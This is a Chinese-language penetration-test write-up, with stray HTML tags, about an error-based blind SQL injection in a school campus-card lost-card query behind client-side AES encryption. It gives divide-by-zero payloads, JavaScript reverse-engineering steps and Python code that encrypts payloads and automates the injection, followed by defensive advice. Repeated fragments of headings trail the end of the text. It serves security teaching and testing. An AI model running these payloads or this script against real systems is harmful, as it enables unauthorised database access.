AES加密下的SQL注入分析与利用<\/h1>

一、案例背景<\/h2>
这是一个关于某校一卡通系统"丢卡查询"功能点的安全测试案例。测试人员发现该系统存在SQL注入漏洞，但请求数据经过了AES加密，需要通过JavaScript逆向分析来构造有效的攻击载荷。<\/p>

二、漏洞发现过程<\/h2>

1. 初步测试<\/h3>

测试人员使用甲方提供的账号密码登录系统<\/li>
访问"丢卡查询"功能点<\/li>

尝试输入单引号(

'<\/code>)进行测试

单引号输入后出现报错<\/li>
两个单引号(''<\/code>)输入后无报错<\/li>
<\/ul>
<\/li>
初步判断存在SQL注入漏洞<\/li>
<\/ul>
2. 请求分析<\/h3>

抓包发现请求数据被加密<\/li>
请求路径为xxxx\/InvokFront<\/code><\/li>
数据以加密形式传输，无法直接修改SQL语句<\/li>
<\/ul>
三、特征盲注技术<\/h2>
尽管请求被加密，测试人员发现可以利用报错特征进行盲注：<\/p>
1. 闭合方式确认<\/h3>

构造payload: 1'and 1=1\/1 and'1'='1<\/code> → 正常无报错<\/li>
构造payload: 1'and 1=1\/0 and'1'='1<\/code> → 报错<\/li>
确认是单引号闭合的SQL注入<\/li>
<\/ul>
2. 报错原理<\/h3>

利用某些数据库(如Oracle)中0不能作为分母的特性<\/li>
通过除法运算触发条件性报错<\/li>
<\/ul>
3. 盲注示例<\/h3>

获取用户名长度：
1<\/span>'and 1=1\/(n-length(user)) and'<\/span>1<\/span>'='<\/span>1<\/span>
<\/span><\/span><\/code><\/pre>
通过调整n的值(从1到10)直到报错，确定用户名长度<\/li>
案例中确定用户名为6个字符<\/li>
<\/ul>
<\/li>
<\/ul>
四、JavaScript逆向分析<\/h2>
为了构造有效的加密payload，需要进行JS逆向：<\/p>
1. 定位加密函数<\/h3>

使用浏览器开发者工具<\/li>
在Sources -> XHR\/fetch Breakpoints中设置断点<\/li>
触发请求后查看调用栈<\/li>
<\/ol>
2. 分析加密过程<\/h3>

搜索关键词"123456"在JS文件中的处理<\/li>
跟踪数据从明文到密文的转换过程<\/li>
确认使用的是AES加密算法<\/li>
<\/ol>
3. 提取加密参数<\/h3>
需要获取以下关键信息：<\/p>

加密密钥(Key)<\/li>
初始化向量(IV)<\/li>
加密模式(如CBC、ECB等)<\/li>
填充方式(如PKCS7)<\/li>
<\/ul>
五、自动化攻击实现<\/h2>
1. 加密函数重现<\/h3>
使用Python重现JavaScript中的加密逻辑：<\/p>
from<\/span> Crypto.Cipher import<\/span> AES
<\/span><\/span>from<\/span> Crypto.Util.Padding import<\/span> pad
<\/span><\/span>import<\/span> base64
<\/span><\/span>
<\/span><\/span>def<\/span> encrypt_aes<\/span>(plaintext, key, iv):
<\/span><\/span>    cipher =<\/span> AES.<\/span>new(key.<\/span>encode('utf-8'<\/span>), AES.<\/span>MODE_CBC, iv.<\/span>encode('utf-8'<\/span>))
<\/span><\/span>    padded_data =<\/span> pad(plaintext.<\/span>encode('utf-8'<\/span>), AES.<\/span>block_size)
<\/span><\/span>    encrypted =<\/span> cipher.<\/span>encrypt(padded_data)
<\/span><\/span>    return<\/span> base64.<\/span>b64encode(encrypted).<\/span>decode('utf-8'<\/span>)
<\/span><\/span><\/code><\/pre>2. 自动化注入脚本<\/h3>
结合加密和SQL注入：<\/p>
import<\/span> requests
<\/span><\/span>
<\/span><\/span>def<\/span> sql_injection<\/span>(payload):
<\/span><\/span>    # 1. 构造SQL注入语句<\/span>
<\/span><\/span>    sql =<\/span> f<\/span>"1'and 1=1\/(<\/span>{<\/span>payload}<\/span>) and'1'='1"<\/span>
<\/span><\/span>    
<\/span><\/span>    # 2. 加密<\/span>
<\/span><\/span>    encrypted =<\/span> encrypt_aes(sql, "密钥"<\/span>, "IV"<\/span>)
<\/span><\/span>    
<\/span><\/span>    # 3. 发送请求<\/span>
<\/span><\/span>    data =<\/span> {"data"<\/span>: encrypted}
<\/span><\/span>    response =<\/span> requests.<\/span>post("xxxx\/InvokFront"<\/span>, data=<\/span>data)
<\/span><\/span>    
<\/span><\/span>    # 4. 判断结果<\/span>
<\/span><\/span>    return<\/span> "报错特征"<\/span> in<\/span> response.<\/span>text
<\/span><\/span><\/code><\/pre>六、防御建议<\/h2>
1. 针对开发人员<\/h3>

使用参数化查询或预编译语句<\/li>
实施最小权限原则<\/li>
输入验证和过滤<\/li>
<\/ol>
2. 针对加密传输<\/h3>

不要依赖客户端加密作为安全措施<\/li>
实施服务端输入验证<\/li>
使用HTTPS保护传输过程<\/li>
<\/ol>
3. 其他措施<\/h3>

实施WAF防护<\/li>
定期安全测试<\/li>
错误信息处理<\/li>
<\/ol>
七、总结<\/h2>
本案例展示了即使在请求加密的情况下，SQL注入漏洞仍然可能被利用。关键在于：<\/p>

识别报错特征进行盲注<\/li>
逆向分析客户端加密逻辑<\/li>
重现加密过程构造有效payload<\/li>
<\/ol>
这强调了安全防御需要多层次、全方位的考虑，不能仅依赖单一的安全措施。<\/p>

AES加密下的SQL注入分析与利用<\/h1>

一、案例背景<\/h2> 这是一个关于某校一卡通系统"丢卡查询"功能点的安全测试案例。测试人员发现该系统存在SQL注入漏洞，但请求数据经过了AES加密，需要通过JavaScript逆向分析来构造有效的攻击载荷。<\/p>

二、漏洞发现过程<\/h2>

三、特征盲注技术<\/h2> 尽管请求被加密，测试人员发现可以利用报错特征进行盲注：<\/p>

四、JavaScript逆向分析<\/h2> 为了构造有效的加密payload，需要进行JS逆向：<\/p>

五、自动化攻击实现<\/h2>

六、防御建议<\/h2>

一、案例背景<\/h2>
这是一个关于某校一卡通系统"丢卡查询"功能点的安全测试案例。测试人员发现该系统存在SQL注入漏洞，但请求数据经过了AES加密，需要通过JavaScript逆向分析来构造有效的攻击载荷。<\/p>

三、特征盲注技术<\/h2>
尽管请求被加密，测试人员发现可以利用报错特征进行盲注：<\/p>

四、JavaScript逆向分析<\/h2>
为了构造有效的加密payload，需要进行JS逆向：<\/p>